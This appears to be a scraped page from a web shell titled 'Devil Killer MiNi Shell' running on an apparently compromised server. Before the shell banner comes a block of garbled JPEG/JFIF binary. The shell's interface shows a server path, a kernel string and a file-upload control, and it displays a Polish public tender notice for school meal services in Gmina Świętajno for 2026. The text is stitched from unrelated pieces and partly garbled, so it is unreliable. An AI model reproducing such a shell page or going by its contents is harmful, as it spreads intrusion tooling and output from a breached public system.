JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20251107/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20251107/0052384501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Prowadzenie stołówki szkolnej wraz z przygotowaniem , dowiezieniem i wydaniem posiłków w placówkach oświatowych na terenie Gminy Świętajno w 2026 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG WSPÓLNYCH GMINY ŚWIĘTAJNO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 365979366</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Parkowa 48</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świętajno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">12-140</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">516 371 731</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">89 623 18 20</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cuw@swietajno.ug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">cuwswietajno.naszbip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prowadzenie stołówki szkolnej wraz z przygotowaniem , dowiezieniem i wydaniem posiłków w placówkach oświatowych na terenie Gminy Świętajno w 2026 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fcd4119a-856b-40dc-9c42-fb9ced9562d0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00523845</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00517426/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Prowadzenie stołówki szkolnej wraz z przygotowaniem, dowiezieniem i wydaniem posiłków w placówkach oświatowych na terenie Gminy Świętajno w 2026 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W postępowaniu komunikacja pomiędzy zamawiającym a wykonawcami, w szczególności <br/>składanie zapytań do treści SWZ, oświadczeń, zawiadomień oraz przekazywanie informacji, <br/>odbywa się elektronicznie: <br/>1) za pośrednictwem platformy zakupowej znajdującej się pod adresem <br/>https://platformazakupowa.pl Gdzie po wybraniu właściwego postępowania należy skorzystać <br/>z formularza „Wyślij wiadomość do zamawiającego” w sekcji „Komunikaty” lub <br/>2) za pomocą poczty elektronicznej cuw@swietajno.ug.gov.pl. <br/>2. Zasady korzystania z platformy zakupowej <br/>1) korzystanie z platformy zakupowej jest bezpłatne, <br/>2) zaleca się, aby przed rozpoczęciem wypełniania Formularza składania oferty wykonawca <br/>zalogował się do systemu, a jeżeli nie posiada konta, założył bezpłatne konto. W przeciwnym <br/>wypadku wykonawca będzie miał ograniczone funkcjonalności, np. brak widoku wiadomości <br/>prywatnych od zamawiającego w systemie lub możliwości wycofania oferty lub wniosku bez <br/>kontaktu z Centrum Wsparcia Klienta, <br/>3) wykonawca może zwrócić się do zamawiającego z wnioskiem o wyjaśnienie treści SWZ. <br/>Wniosek można przesłać za pośrednictwem platformy zakupowej przez formularz „Wyślij <br/>wiadomość do zamawiającego”. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie <br/>dokumentów lub oświadczeń składane są przez wykonawcę za pośrednictwem przycisku „Wyślij <br/>wiadomość do zamawiającego” jako załączniki. Po kliknięciu przycisku „Wyślij” pojawi się <br/>komunikat systemowy, że wiadomość została wysłana, <br/>4) wszelkie instrukcje związane z korzystaniem platformy zakupowej, w szczególności dotyczące <br/>logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności <br/>podejmowanych w postępowaniu, znajdują się na stronie internetowej pod adresem <br/>https://platformazakupowa.pl/strona/instrukcje-wykonwaca,</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych <br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy <br/>95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej <br/>„Rozporządzenie”, informuje, że: <br/>1) Administratorem Pani/Pana danych osobowych jest Centrum usług wspólnych Gminy <br/>Świętajno (z siedzibą pod adresem: Centrum Usług Wspólnych Gminy Świętajno, ul. <br/>Parkowa 48, 12-140 Świętajno, tel. 89 623 18 20, email: cuw@swietajno.ug.gov.pl. <br/>2) W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się <br/>z Inspektorem Danych Osobowych pod adresem email: iod@tutamail.com <br/>3) Dane osobowe będą przetwarzane w celu związanym z postępowanie o udzielenie <br/>zamówienia publicznego. <br/>4) Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia <br/>11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019), zwanej <br/>dalej PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas <br/>obowiązywania umowy. <br/>5) Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia <br/>w związku z przepisami PZP. <br/>6) Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie <br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 4 PZP. <br/>7) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana <br/>dotyczących jest wymogiem ustawowym określonym w przepisach PZP, związanym <br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje <br/>niepodania określonych danych wynikają z PZP. <br/>8) Osoba, której dane dotyczą ma prawo do: - dostępu do treści swoich danych oraz możliwości ich poprawienia, sprostowania, <br/>ograniczenia przetwarzania, - w przypadku, gdy przetwarzanie danych odbywa się z naruszeniem przepisów <br/>Rozporządzenia służy prawo wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu <br/>Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, <br/>9) Osobie, której dane dotyczą nie przysługuje: - w związku z art. 17 ust 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych <br/>osobowych; - prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia; - na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych <br/>osobowych; <br/>10) W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust 1-3 <br/>Rozporządzenia, wymagałoby niewspółmiernie dużego wysiłku, Administrator może <br/>żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na <br/>celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania <br/>o udzielenie zamówienia publicznego. <br/>11) Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub <br/>uzupełnienia danych osobowych, o których mowa w art. 16 Rozporządzenia, nie może <br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub <br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z PZP.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OS.260.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Nazwa przedmiotu zamówienia <br/>2. Nazwa i kod przedmiotu zamówienia według Wspólnego Słownika Zamówień: <br/>1) 55321000 – 6 – usługi przygotowywania posiłków <br/>2) 55320000 – 9 – Usługa podawania posiłków <br/>3) 55521200 – 0 – Usługa dowożenia posiłków <br/>4) 55520000-1 – Usługi dostarczania posiłków <br/>5) 55523100-3 – Usługi w zakresie posiłków szkolnych <br/>6) 55524000-9 – Usługi dostarczania posiłków do szkół <br/>3. Wykonawca zobowiązany będzie do świadczenia usługi dla około 105 osób okresie od <br/>2 stycznia do 22 grudnia 2026 r. <br/>4. Szczegółowy opis przedmiotu zamówienia: <br/>1)Przedmiotem zamówienia jest prowadzenie stołówki szkolnej wraz usługą przygotowania, dowiezienia <br/>i wydawania posiłków dzieciom w szkole podstawowej w dni objęte nauką szkolną w następujących <br/>placówkach oświatowych na terenie Gminy Świętajno: <br/>a)Szkoła Podstawowa im. Ignacego Krasickiego w Świętajnie: - uczniowie: 60 osób – wydawanie w stołówce szkolnej, <br/>b)Szkoła Podstawowa im. Kornela Makuszyńskiego w Jerutach: - uczniowie: 25 osób – dowóz do szkoły <br/>c) Szkoła Podstawowa im. Ignacego Marii Zientary Malewskiej w Spychowie: - uczniowie: 20 osób- dowóz do szkoły. <br/>2) Stołówka szkolna będzie prowadzona przez Wykonawcę w lokalu użytkowym przy ul. Mickiewicza 13 <br/>składającym się z pomieszczeń stołówki i kuchni. Wykonawca będzie zobowiązany do zawarcia umowy <br/>najmu na warunkach określonych w umowie najmu stanowiącej załącznik do umowy o prowadzenie <br/>stołówki szkolnej. Oferent zobowiązany jest zapoznać się szczegółowo z warunkami umowy i uwzględnić <br/>koszty jej zawarcia w kalkulacji oferty. <br/>Łącznie szacunkowa liczba dzieci objętych dożywianiem 105 <br/>3)W <br/>okresie <br/>objętym <br/>zamówieniem <br/>przewiduje <br/>się <br/>wydanie <br/>łącznie <br/>ok. 19 635 posiłków. Dzienna liczba posiłków ok. 105, dla uczniów w szkołach x średnio 187 dni <br/>żywieniowych (dni nauki szkolnej). Jest to wartość szacunkowa i nie może stanowić podstawy do <br/>wnoszenia przez Wykonawcę jakichkolwiek roszczeń co do wysokości faktycznej należności z tytułu <br/>wykonania umowy. <br/>4)Posiłki dla uczniów w szkołach powinny mieć formę jednodaniowego ciepłego obiadu serwowanego <br/>na przemian w następujący sposób: <br/>a) dwa razy w tygodniu zupa (wtorek, czwartek), <br/>b) trzy razy w tygodniu drugie danie (poniedziałek, środa, piątek). <br/>5)Przez jeden posiłek dla uczniów w szkole Zamawiający rozumie: <br/>a)zupę ugotowaną na mięsie <br/>w ilości 350 - 400 ml + 2 kromki chleba <br/>w ustalone dni tygodnia (np. jarzynową, buraczkową, ogórkową, pomidorową zaprawioną śmietaną lub <br/>jogurtem naturalnym, lub grochową z połówek grochu, zacierkową, rosół z kawałkiem kurczaka, krupnik). <br/>b)drugie danie w ustalone dni tygodnia składające się z: -mięsa <br/>lub <br/>ryby <br/>o <br/>gramaturze <br/>150 <br/>g. <br/>np. <br/>gulaszu, <br/>potrawki <br/>z kurczaka, klopsików, kotleta schabowego, kotleta z piersi z kurczaka, kotleta z pieczarkami, kotleta <br/>mielonego, ryby w panierce lub bez, ryby w sosie, sztuki mięsa w sosie, dodatków do mięsa w postaci <br/>ziemniaków, kaszy, ryżu, makaronu, klusek o gramaturze 150 g., dodatków w postaci surówki <br/>o gramaturze 50 g. -kompotu 200 ml. lub soku 200 ml. podanego dla każdego dziecka w oddzielnym opakowaniu -jeden raz w tygodniu drugie danie mogą stanowić pierogi, kopytka, naleśniki z serem lub krokiety – w <br/>ilości 400 gramów. <br/>Zamawiający zastrzega, że danie takie jak pierogi, naleśniki z serem, kopytka, krokiety winny być <br/>maksimum 2 - 3 razy w miesiącu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55320000-9 - Usługi podawania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55521200-0 - Usługi dowożenia posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <p class="mb-0">55523100-3 - Usługi w zakresie posiłków szkolnych</p> <p class="mb-0">55524000-9 - Usługi dostarczania posiłków do szkół</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-02 do 2026-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający informuje, że w sytuacji, gdy mowa jest o cenie – należy przez to rozumieć cenę <br/>w rozumieniu ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz.U. z 2023 <br/>r. poz. 168). <br/>2.Cena wykonania zamówienia musi obejmować wszystkie koszty związane z wykonaniem <br/>odpowiadającego jej zakresu przedmiotu zamówienia oraz warunkami stawianymi przez <br/>zamawiającego w SWZ. <br/>3. Cenę należy podać do dwóch miejsc po przecinku i musi być podana w PLN cyfrowo i słownie <br/>z wyodrębnieniem należytego podatku VAT – jeżeli występuje. <br/>4. Obliczenie całkowitej ceny brutto zamówienia służy do celów porównania złożonych ofert, <br/>ostateczna wysokość wynagrodzenia może być mniejsza, uzależniona od rzeczywistego <br/>zapotrzebowania. <br/>5. Cenę za wykonanie zamówienia należy przedstawić w formularzu oferty stanowiącym załącznik <br/>nr 2 do SWZ. <br/>6. Jeżeli została złożona oferta, której wybór prowadziłby do powstania u zamawiającego <br/>obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług <br/>9dz.U. z 2025 r. poz. 775 z późn. zm.), dla celów zastosowania kryterium ceny zamawiający doliczy <br/>do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek <br/>rozliczyć. W ofercie wykonawca ma obowiązek: <br/>1) poinformowania zamawiającego, że wybór jego oferty będzie prowadził do powstania <br/>u zamawiającego obowiązku podatkowego, <br/>2) wskazania nazwy (rodzaju) usługi, których dostawa lub świadczenie usługi będą prowadziły do <br/>powstania obowiązku podatkowego, <br/>3) wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym zamawiającego, bez <br/>kwoty podatku, <br/>4) wskazania stawki podatku od towarów i usług, która zgodnie z wiedza wykonawcy, będzie miała <br/>zastosowanie. <br/>7. Cena w formularzu ofertowym winna być podana w złotych polskich cyframi <br/>i słownie. Wykonawca w formularzu ofertowym podaje cenę netto, podatek od towarów i usług <br/>(VAT w %) oraz cenę brutto. Zamawiający do ustalenia ceny oferty przyjmuje cenę brutto <br/>uwzględniającą podatek od towarów i usług. <br/>8.Ustala się sposób obliczenia ceny za Zamówienie jako iloczyn średniej dziennej stawki brutto <br/>do liczby dni świadczenia usługi w roku szkolnym – 187 dni oraz liczby osób objętych <br/>zamówieniem – 105 osób. Cena uwzględnia wszelkie koszty związane z realizacją zamówienia, <br/>w tym koszty związane z zatrudnieniem na umowę o pracę. Stawka za jeden posiłek jest stawką <br/>ryczałtową i nie ulega zmianie w przypadku zwiększenia/zmniejszenia lub zmiany liczby <br/>dożywianych osób w zakresie ± 15% wielkości wykonywanego zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na <br/>zasadach określonych w Rozdziale IX oraz spełniają określone przez Zamawiającego warunki <br/>udziału w postępowaniu. <br/>2.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>a) zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie <br/>b) uprawnień do prowadzenia określonej działalności gospodarczej: <br/>Zamawiający nie stawia warunku w powyższym zakresie <br/>c) sytuacji ekonomicznej lub finansowej: Wykonawca spełni ten warunek, jeżeli wskaże, że <br/>jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/>związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 200.000,00 zł. <br/>d) zdolności technicznej lub zawodowej: <br/>• w zakresie wykształcenia: Zamawiający nie wyznacza szczegółowego warunku w tym <br/>zakresie. <br/>• w zakresie kwalifikacji zawodowych: Zamawiający nie wyznacza szczegółowego warunku <br/>w tym zakresie. <br/>• w zakresie doświadczenia: Wykonawca spełni warunek, jeżeli wykaże, że w okresie <br/>ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia <br/>działalności jest krótszy – w tym okresie, wykonał należycie dwie usługi polegające na <br/>zapewnieniu usługi przygotowania posiłków, z których wartość każdej była nie mniejsza <br/>niż 20 000,00 zł brutto w ramach jednej umowy (kontraktu). <br/>• W zakresie potencjału technicznego Wykonawcy: Zamawiający nie wyznacza <br/>szczegółowego warunku w tym zakresie. <br/>• w zakresie osób skierowanych do realizacji zamówienia: Zamawiający nie wyznacza <br/>szczegółowego warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, wraz <br/>ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym <br/>wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia <br/>załącznik nr 6 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców <br/>oświadczenie składa każdy z wykonawców wspólnie ubiegający się o zamówienie, <br/>b) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca <br/>nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego <br/>nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem <br/>podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów, że <br/>odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych <br/>podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w 